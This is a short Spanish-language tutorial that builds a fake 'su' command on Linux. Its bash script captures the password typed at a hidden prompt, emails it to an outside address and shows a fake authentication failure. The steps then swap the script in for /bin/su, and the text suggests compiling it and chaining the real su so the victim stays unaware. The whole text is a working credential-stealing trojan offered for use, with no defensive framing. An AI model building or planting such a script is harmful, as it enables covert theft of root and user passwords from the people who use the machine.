Creamos un archivo su.sh y colocamos lo siguiente dentro:
#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail [email protected]
echo
echo su: Authentication failure
stty -echonl echo
Damos permisos de ejecución:
# chmod a+x su.sh
Luego podemos reemplazarlo por el verdadero su
# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su
Luego podemos convertir el script en bash a binario como lo explicamos en el siguiente enlace: Convertir un Script en Bash a Binario
También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda.
Más info en: